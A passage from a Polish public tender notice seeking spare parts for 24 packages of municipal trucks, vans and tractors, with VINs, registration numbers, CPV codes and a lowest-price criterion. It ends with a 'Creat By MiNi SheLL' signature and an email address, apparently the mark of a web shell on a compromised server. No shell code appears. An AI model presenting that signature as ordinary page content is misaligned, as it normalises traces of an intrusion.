-SCANIA  P 94 GB, VIN YS2P4X20001242965, nr rej. DLU A519,rok produkcji 1999.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 1 - części zamienne do samochodów: 
-SCANIA 6X2 VIN XLEP6X20005205490, nr rej. DLU 81WE, rok produkcji 2008
-SCANIA 6X2, VIN YS2PX20001280243, nr rej. DLU R928,   rok produkcji 2002
-SCANIA  P 94 GB, VIN YS2P4X20001242965, nr rej. DLU A519,rok produkcji 1999   
Wykaz cześć zamiennych zamieszczony jest w załączniku nr 2 do SIWZ ( Wykaz części - formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 2 - części zamienne do samochodów: 
-VOLVO  FM - 09C1R/SM, VIN YV2JHCOCX5A599506, nr rej. DLU 1V95,rok produkcji 2005.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 2 - części zamienne do samochodów: 
-VOLVO  FM - 09C1R/SM, VIN YV2JHCOCX5A599506, nr rej. DLU 1V95,rok produkcji 2005 zgdnie z wykazem części w załaczniku nr 2 do SIWZ (Wykaz części - Fornularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 3 - części zamienne do samochodów: 
-JELCZ 422 240 R6, VIN SUJP422BAV0000454, nr rej. LGF 3309, rok produkcji 1997
-JELCZ 422 240 R6, VIN SUJP422BAT0000346, nr rej. LIE 0589,rok produkcji 1996
-JELCZ 422 240 R6, VIN SUJP422BAT0000400, nr rej. DLU 00418, rok produkcji 1996.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 3 - części zamienne do samochodów: 
-JELCZ 422 240 R6, VIN SUJP422BAV0000454, nr rej. LGF 3309, rok produkcji 1997
-JELCZ 422 240 R6, VIN SUJP422BAT0000346, nr rej. LIE 0589,rok produkcji 1996
-JELCZ 422 240 R6, VIN SUJP422BAT0000400, nr rej. DLU 00418, rok produkcji 1996
zgodnie z wykazem części zamieszczonym w załaczniku nr 2 do SIWZ ( Wykaz części -formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet Nr 4 - części zamienne do samochodu: 
-STAR 742, VIN SUSAFA2B5MA000217, nr rej. LCE 8656, rok produkcji 1992.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 4 - części zamienne do samochodu: 
-STAR 742, VIN SUSAFA2B5MA000217, nr rej. LCE 8656, rok produkcji 1992
zgodnie z załącznikiem nr 2 do SIWZ ( wykaz części - formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet Nr 5 - części zamienne do samochodu:
-RENAULT PREMIUM  410.26 6x4, VIN VF624DPA000000192 , 
nr rej. DLU 29XW, rok produkcji 2008.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 5 - części zamienne do samochodu:
-RENAULT PREMIUM  410.26 6x4, VIN VF624DPA000000192 , 
nr rej. DLU 29XW, rok produkcji 2008.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet Nr 6 - części zamienne do samochodów: 
-VOLVO  FL6, VIN YV2E4CAA44B354400 , nr rej. DLU 1G05, rok produkcji 2003
-VOLVO  FL6/W, VIN YV2E4CAA35B391679, nr rej. DLU 9U49, rok produkcji 2004.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 6 - części zamienne do samochodów: 
-VOLVO  FL6, VIN YV2E4CAA44B354400 , nr rej. DLU 1G05,  rok produkcji 2003
-VOLVO  FL6/W, VIN YV2E4CAA35B391679, nr rej. DLU 9U49,  rok produkcji 2004
zgodnie z załacznikiem nr 2 do SIWZ ( Wykaz części- Formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet Nr 7 - części zamienne do samochodów: 
-JELCZ 317  PHN2, NR 20581, nr rej. LGE 430D, rok produkcji 1991
-JELCZ 325 P, NR 21099, nr rej. LCE 7817, rok produkcji 1992
-JELCZ 325 JPM 1, VIN SUJP325POE0011967, nr rej. LGE 730C, rok produkcji 1989.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 7 - części zamienne do samochodów: 
-JELCZ 317  PHN2, NR 20581, nr rej. LGE 430D, rok produkcji 1991
-JELCZ 325 P, NR 21099, nr rej. LCE 7817, rok produkcji 1992
-JELCZ 325 JPM 1, VIN SUJP325POE0011967, nr rej. LGE 730C, rok produkcji 1989
zgodnie z załacznikiem nr 2 do SIWZ ( wykaz części - formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet Nr 8 - części zamienne do samochodów: 
-STAR 1500 1142, VIN DLU001030058, nr rej. DLU U611, rok produkcji 2000
-STAR  1500 1142, VIN SUS1142CFX0014966, nr rej. DLU U609, rok produkcji 1999.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 8 - części zamienne do samochodów: 
-STAR 1500 1142, VIN DLU001030058, nr rej. DLU U611, rok produkcji 2000
-STAR  1500 1142, VIN SUS1142CFX0014966, nr rej. DLU U609, rok produkcji 1999  zgodnie z załacznikiem nr 2 do SIWZ ( Wykaz części - formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet Nr 9 - części zamienne do samochodu: 
-MERCEDES-BENZ Atego 1518  LKO, VIN WDB9752621L236663, nr rej. DLU 01106, rok produkcji 2007.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 9 - części zamienne do samochodu: 
-MERCEDES-BENZ Atego 1518  LKO, VIN WDB9752621L236663, nr rej. DLU 01106, rok produkcji 2007 zgodnie z załącznikiem nr 2 do SIWZ ( Wykaz części - formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet Nr 10 - części zamienne do samochodu:
-MERCEDES-BENZ 917KD, VIN WDB6760902K209070, nr rej. LIE 3048, rok produkcji 1996.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 10 - części zamienne do samochodu:
-MERCEDES-BENZ 917KD, VIN WDB6760902K209070, nr rej. LIE 3048, rok produkcji 1996 zgodnie z załacznikiem nr 2 do SIWZ ( wykaz części - formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet Nr 11 - części zamienne do samochodów: 
-LIAZ 110.850, VIN TNKK54101KS000246, nr rej. LGE 988D, rok produkcji 1989
-LIAZ 110.850, VIN D2D0018, nr rej. DLU 95XA, rok produkcji 1988.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 11 - części zamienne do samochodów: 
-LIAZ 110.850, VIN TNKK54101KS000246, nr rej. LGE 988D, rok produkcji 1989
-LIAZ 110.850, VIN D2D0018, nr rej. DLU 95XA, rok produkcji 1988 zgodnie z załacznikiem nr 2 do SIWZ ( wykaz części -formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet Nr 12 - części zamienne do samochodów: 
0.CRAFTER 2FJE2,  VIN WV1ZZZ2F87007872, nr rej. DLU 08VW, rok produkcji 2008
1.CRAFTER 2FJZ,   VIN WV1ZZZ2FZ97002560, nr rej. DLU 14WS rok produkcji 2008
2.CRAFTER 2FJZ,   VIN WV1ZZZ2FZ87003818, nr rej. DLU 98NW, rok produkcji 2007
3.CRAFTER 2FJZ,   VIN WV1ZZZ2F87003819, nr rej. DLU 94NW, rok produkcji 2007.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 12 - części zamienne do samochodów: 
0.CRAFTER 2FJE2,  VIN WV1ZZZ2F87007872, nr rej. DLU 08VW, rok produkcji 2008
1.CRAFTER 2FJZ,   VIN WV1ZZZ2FZ97002560, nr rej. DLU 14WS rok produkcji 2008
2.CRAFTER 2FJZ,   VIN WV1ZZZ2FZ87003818, nr rej. DLU 98NW, rok produkcji 2007
3.CRAFTER 2FJZ,   VIN WV1ZZZ2F87003819, nr rej. DLU 94NW, rok produkcji 2007
zgodnie z załacznikiem nr 2 do SIWZ ( Wykaz części - formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet Nr 13 - części zamienne do samochodu: 
-RENAULT  Megane Scenic, VIN VFJAOGO517367093  , nr rej. LIE 5044,rok produkcji 1997.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 13 - części zamienne do samochodu: 
-RENAULT  Megane Scenic, VIN VFJAOGO517367093  , nr rej. LIE 5044, rok produkcji 1997 , zgodnie z załącznikiem nr 2 do SIWZ ( wykaz części- formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet Nr 14 - części zamienne do samochodu: 
-MULTICAR M26 A TD, VIN WMU2M26231W100704, nr rej. DLU H072, rok produkcji 2000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 14 - części zamienne do samochodu: 
-MULTICAR M26 A TD, VIN WMU2M26231W100704, nr rej. DLU H072, rok produkcji 2000, zgodnie z załacznikim nr 2 do SIWZ ( wykaz części- formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet Nr 15 - części zamienne do samochodu: 
-ŻUK A16 D, VIN SUL16121IT058411 nr rej. DLU 6W08, rok produkcji 1996.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 15 - części zamienne do samochodu: 
-ŻUK A16 D, VIN SUL16121IT058411 nr rej. DLU 6W08,                                       rok produkcji 1996, zgodnie z załącznikim nr 2 do SIWZ ( Wykaz części- formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet Nr 16 - części zamienne do samochodu:
-VOLKSWAGEN T4, VIN WV12227021X047057 nr rej. DLU H603, rok produkcji 2000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 16 - części zamienne do samochodu:
-VOLKSWAGEN T4, VIN WV12227021X047057 nr rej. DLU H603, rok produkcji 2000 , zgodnie z załacznikim nr 2 do SIWZ ( wykaz części- formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet Nr 17 - części zamienne do samochodu:
-OSTRÓWEK  KT-162, NR 646668  nr rej. LGE 297E, rok produkcji 1992.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 17 - części zamienne do samochodu:
-OSTRÓWEK  KT-162, NR 646668  nr rej. LGE 297E, rok produkcji 1992, zgodnie z załącznikim nr 2 do SIWZ ( Wykaz cześci - formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet Nr 18- części zamienne do samochodu:
-PRONAR MTZ 320 AMK, VIN 01270A nr rej. DLU M531,  rok produkcji 2005.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 18- części zamienne do samochodu:
-PRONAR MTZ 320 AMK, VIN 01270A nr rej. DLU M531,  rok produkcji 2005 , zgodnie z załacznikiem nr 2 do SIWZ ( Wykaz części - formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet Nr 19 - części zamienne do samochodu:
-URSUS C-360, NR 658185   nr rej. LCE 1613, rok produkcji 1992.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 19 - części zamienne do samochodu:
-URSUS C-360, NR 658185   nr rej. LCE 1613, rok produkcji 1992, zgodnie z załącznikiem nr 2 do SIWZ ( Wykaz części - formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet Nr 20- części zamienne do samochodu:
-NEW HOLLAND, H TCE 50, VIN HSSZ16610,  nr rej. DLU M49, rok produkcji 2007.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 20- części zamienne do samochodu:
-NEW HOLLAND, H TCE 50, VIN HSSZ16610,  nr rej. DLU M49,                              rok produkcji 2007, zgodnie z załacznikiem nr 2 do SIWZ ( wyka części - formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet Nr 21 - części zamienne do samochodu:
-MT-8 150.32, NR 2019       nr rej. LCE 1796, rok produkcji 1995.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 21 - części zamienne do samochodu:
-MT-8 150.32, NR 2019  nr rej. LCE 1796, rok produkcji 1995.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet Nr 22- części zamienne do samochodu:
-MAN TGM 18.280 4x2 BB, VIN WMAN08Y215447, nr rej. DLU 28XL,rok produkcji 2009.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 22- części zamienne do samochodu:
-MAN TGM 18.280 4x2 BB, VIN WMAN08Y215447, nr rej. DLU 28XL,                     rok produkcji 2009, zgodnie z załącznikim nr 2 do SIWZ ( Wykaz części- formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet Nr 23 - części zamienne luzem do wszystkich typów pojazdów i sprzętu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 23 - części zamienne luzem do wszystkich typów pojazdów i sprzętu zgodnie z załacznikiem nr 2 do SIWZ ( wykaz czesci - formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet Nr 24 - Żarówki luzem  do wszystkich typów pojazdów i sprzętu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 24 - Żarówki luzem  do wszystkich typów pojazdów i sprzętu, zgodnie z załacznikiem nr 2 do SIWZ ( wykaz części- formularz cenowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.33.00.00-9, 34.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com